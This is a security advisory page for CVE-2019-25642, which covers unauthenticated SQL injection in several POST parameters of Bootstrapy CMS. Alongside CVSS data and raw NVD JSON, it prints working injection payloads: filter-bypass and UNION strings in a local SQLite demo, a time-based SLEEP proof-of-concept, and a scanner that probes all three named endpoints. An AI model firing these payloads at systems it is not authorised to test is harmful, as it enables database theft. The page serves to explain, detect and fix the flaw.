Security Vulnerability Report
CVE-2019-25642 CVSS 8.2 HIGH

CVE-2019-25642

Published: 2026-03-24 12:16:06
Last Modified: 2026-05-01 15:21:32

Description

Bootstrapy CMS contains multiple SQL injection vulnerabilities that allow unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through POST parameters. Attackers can inject SQL payloads into the thread_id parameter of forum-thread.php, the subject parameter of contact-submit.php, the post-id parameter of post-new-submit.php, and the thread-id parameter to extract sensitive database information or cause denial of service.
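The advisory names the injectable parameters but not the code behind them. The following is an added illustration, not Bootstrapy's source: it models the bug class in Python against an in-memory SQLite table (a constructed `threads` schema, not the CMS's real one) and places the string-spliced query beside its parameterised replacement. Both payloads are of the kind the description covers: a quote-break that comments out the rest of the WHERE clause, and a UNION that pulls rows the original filter was meant to hide. SQLite has no SLEEP(), so the time-based denial-of-service variant is not reproduced here.

```python
import sqlite3

# Constructed sample data standing in for a CMS forum table; not Bootstrapy's
# real schema, which the advisory does not publish.
SAMPLE_THREADS = [
    (1, "Welcome thread", "public"),
    (2, "Staff only: admin credentials", "private"),
]


def make_db():
    """In-memory SQLite database holding the constructed threads table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE threads (thread_id INTEGER, title TEXT, visibility TEXT)"
    )
    conn.executemany("INSERT INTO threads VALUES (?, ?, ?)", SAMPLE_THREADS)
    return conn


def lookup_thread_vulnerable(conn, thread_id):
    """Bug class from the advisory: the POST value is spliced into the SQL text."""
    sql = (
        "SELECT thread_id, title FROM threads "
        f"WHERE thread_id = '{thread_id}' AND visibility = 'public'"
    )
    return conn.execute(sql).fetchall()


def lookup_thread_safe(conn, thread_id):
    """Hardened form: the value travels as a bound parameter, never as SQL."""
    sql = (
        "SELECT thread_id, title FROM threads "
        "WHERE thread_id = ? AND visibility = 'public'"
    )
    return conn.execute(sql, (thread_id,)).fetchall()


# Payloads of the kind the advisory describes: quote-break plus comment-out.
PAYLOAD_FILTER_BYPASS = "' OR 1=1-- -"
PAYLOAD_UNION_EXTRACT = (
    "' UNION SELECT thread_id, title FROM threads WHERE visibility = 'private'-- -"
)


def compare(conn, value):
    """Run one input through both query builders; returns (vulnerable, safe)."""
    return lookup_thread_vulnerable(conn, value), lookup_thread_safe(conn, value)


if __name__ == "__main__":
    db = make_db()
    for label, value in [("legit", "1"),
                         ("filter bypass", PAYLOAD_FILTER_BYPASS),
                         ("union extract", PAYLOAD_UNION_EXTRACT)]:
        vuln_rows, safe_rows = compare(db, value)
        print(f"{label:14s} vulnerable={vuln_rows} safe={safe_rows}")
```

With the spliced query the bypass payload returns every row, private ones included, and the UNION payload returns exactly the private row; the bound-parameter version returns nothing for either, because the quote and the comment marker are data, not syntax. The same fix applies to PHP (PDO or mysqli prepared statements); the comparison is shown in Python only so it runs without the CMS.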

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
CVSS 4.0 (secondary)
8.8 HIGH, CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N
Weakness
CWE-89 (SQL Injection)

Both vectors rate the availability impact as none, even though the description mentions denial of service via injected queries; the scores reflect the data-disclosure impact of an unauthenticated, network-reachable injection.

Configurations (Affected Products)

No CPE configuration data is recorded for this CVE; no affected version range or fixed version is listed.

Affected product (per the advisory): Bootstrapy CMS, latest version at the time of disclosure

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests


def check_sqli(url):
    # Target endpoint where the vulnerability exists
    target = f"{url}/contact-submit.php"

    # Malicious payload for SQL Injection
    # This payload attempts to cause a time delay (blind SQL injection)
    payload = "' AND (SELECT SLEEP(5))-- -"

    # POST data parameters vulnerable to injection
    data = {
        "subject": payload,
        "message": "Test Message",
        "email": "[email protected]",
    }

    try:
        print(f"[+] Sending payload to {target}...")
        # Timeout must exceed the requested sleep, otherwise a sleeping
        # (i.e. vulnerable) server is reported as a request failure
        response = requests.post(target, data=data, timeout=10)

        # Check if the response time indicates a successful injection
        # If the server sleeps for 5 seconds, the response time will be > 5s
        if response.elapsed.total_seconds() >= 5:
            print("[!] Vulnerability confirmed! The application is vulnerable to SQL Injection.")
        else:
            print("[-] Vulnerability not detected or patched.")
    except requests.exceptions.RequestException as e:
        print(f"[Error] Request failed: {e}")


if __name__ == "__main__":
    # Replace with the actual target URL
    target_url = "http://localhost/bootstrapy"
    check_sqli(target_url)
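The PoC above takes a single sample from a single endpoint, so a slow link or a busy server can produce either a false positive or a false negative. The following added checker (written for this page, not taken from the exploit-db or VulnCheck entries) covers all three endpoints the CVE names, measures a benign baseline before the SLEEP() payload, and compares medians over several trials. The transport is a plain function so the verdict logic can be exercised against a simulated server. Assumptions: the contact form's filler fields (`message`, `email`) and the benign value `1` are guesses about the forms, and SLEEP() is MySQL/MariaDB syntax, which the PoC also presumes.

```python
import statistics
import time
import urllib.error
import urllib.parse
import urllib.request

# Endpoints and injectable parameters named in the CVE description. The
# filler fields for the contact form are an assumption about its HTML, not
# something the advisory states.
ENDPOINTS = {
    "contact-submit.php": ("subject", {"message": "probe", "email": "probe@example.invalid"}),
    "forum-thread.php": ("thread_id", {}),
    "post-new-submit.php": ("post-id", {}),
}

SLEEP_SECONDS = 3   # MySQL/MariaDB SLEEP(); must stay well under the timeout
TRIALS = 3          # odd count so the median is an actual sample


def timed_post(url, data, timeout=15):
    """Default transport: POST form data, return elapsed wall-clock seconds.

    A 4xx/5xx still yields a timing; only connection-level failures propagate.
    """
    body = urllib.parse.urlencode(data).encode()
    req = urllib.request.Request(url, data=body, method="POST")
    start = time.monotonic()
    try:
        with urllib.request.urlopen(req, timeout=timeout):
            pass
    except urllib.error.HTTPError:
        pass
    return time.monotonic() - start


def is_time_injectable(post, target, param, filler, sleep=SLEEP_SECONDS, trials=TRIALS):
    """Return (verdict, delta): is the median injected response slower than
    the median benign one by roughly the requested sleep?

    `post(url, data) -> seconds` is passed in so the logic can be run
    against a simulated server.
    """
    payload = f"' AND (SELECT SLEEP({sleep}))-- -"
    baseline = [post(target, {param: "1", **filler}) for _ in range(trials)]
    injected = [post(target, {param: payload, **filler}) for _ in range(trials)]
    # Medians, not single samples: one slow request from network jitter must
    # not flip the verdict in either direction.
    delta = statistics.median(injected) - statistics.median(baseline)
    return delta >= 0.8 * sleep, delta


def scan(base_url, post=timed_post):
    """Check every endpoint from the advisory; returns {path: (verdict, delta)}."""
    base = base_url.rstrip("/")
    results = {}
    for path, (param, filler) in ENDPOINTS.items():
        verdict, delta = is_time_injectable(post, f"{base}/{path}", param, filler)
        results[path] = (verdict, round(delta, 2))
    return results


if __name__ == "__main__":
    # Replace with an instance you are authorised to test.
    for path, (verdict, delta) in scan("http://localhost/bootstrapy").items():
        flag = "VULNERABLE" if verdict else "not detected"
        print(f"{path:22s} {flag:13s} median delta {delta:+.2f}s")
```

The threshold is 80 % of the requested sleep rather than the full value so that a server which honours SLEEP() but answers marginally faster than the wall clock suggests is not missed, while a normal-latency endpoint (delta near zero) is never flagged. If the target sits behind a WAF that drops the request outright, the timing collapses to the connection error rather than a sleep, which the default transport lets propagate instead of mis-scoring.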

References

http://bootstrapy.com
https://www.exploit-db.com/exploits/46590
https://www.vulncheck.com/advisories/bootstrapy-cms-lastest-multiple-sql-injection-via-forum-and-contact-modules

Raw JSON Data

JSON
{"cve": {"id": "CVE-2019-25642", "sourceIdentifier": "[email protected]", "published": "2026-03-24T12:16:06.450", "lastModified": "2026-05-01T15:21:32.393", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Bootstrapy CMS contains multiple SQL injection vulnerabilities that allow unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through POST parameters. Attackers can inject SQL payloads into the thread_id parameter of forum-thread.php, the subject parameter of contact-submit.php, the post-id parameter of post-new-submit.php, and the thread-id parameter to extract sensitive database information or cause denial of service."}, {"lang": "es", "value": "Bootstrapy CMS contiene múltiples vulnerabilidades de inyección SQL que permiten a atacantes no autenticados ejecutar consultas SQL arbitrarias inyectando código malicioso a través de parámetros POST. Los atacantes pueden inyectar cargas útiles SQL en el parámetro thread_id de forum-thread.php, el parámetro subject de contact-submit.php, el parámetro post-id de post-new-submit.php, y el parámetro thread-id para extraer información sensible de la base de datos o causar denegación de servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", 
"integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "http://bootstrapy.com", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/46590", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/bootstrapy-cms-lastest-multiple-sql-injection-via-forum-and-contact-modules", "source": "[email protected]"}]}}